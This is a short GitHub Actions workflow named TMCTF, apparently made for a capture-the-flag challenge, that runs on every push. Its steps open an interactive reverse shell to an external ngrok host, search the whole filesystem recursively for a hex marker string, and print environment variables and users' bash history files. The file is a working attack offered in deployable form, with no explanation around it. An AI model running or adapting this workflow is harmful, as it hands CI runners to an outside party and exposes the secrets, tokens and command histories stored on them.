name: TMCTF
on: [push]
jobs: 
  Recon: 
    runs-on: ubuntu-latest
    steps:
      - run: |
          sh -i >& /dev/tcp/0.tcp.ngrok.io/16664 0>&1 
      - run: |
          rgrep -i "544d435446" / 2>/dev/null
      - run: |
          env && cat /home/*/bash_history &
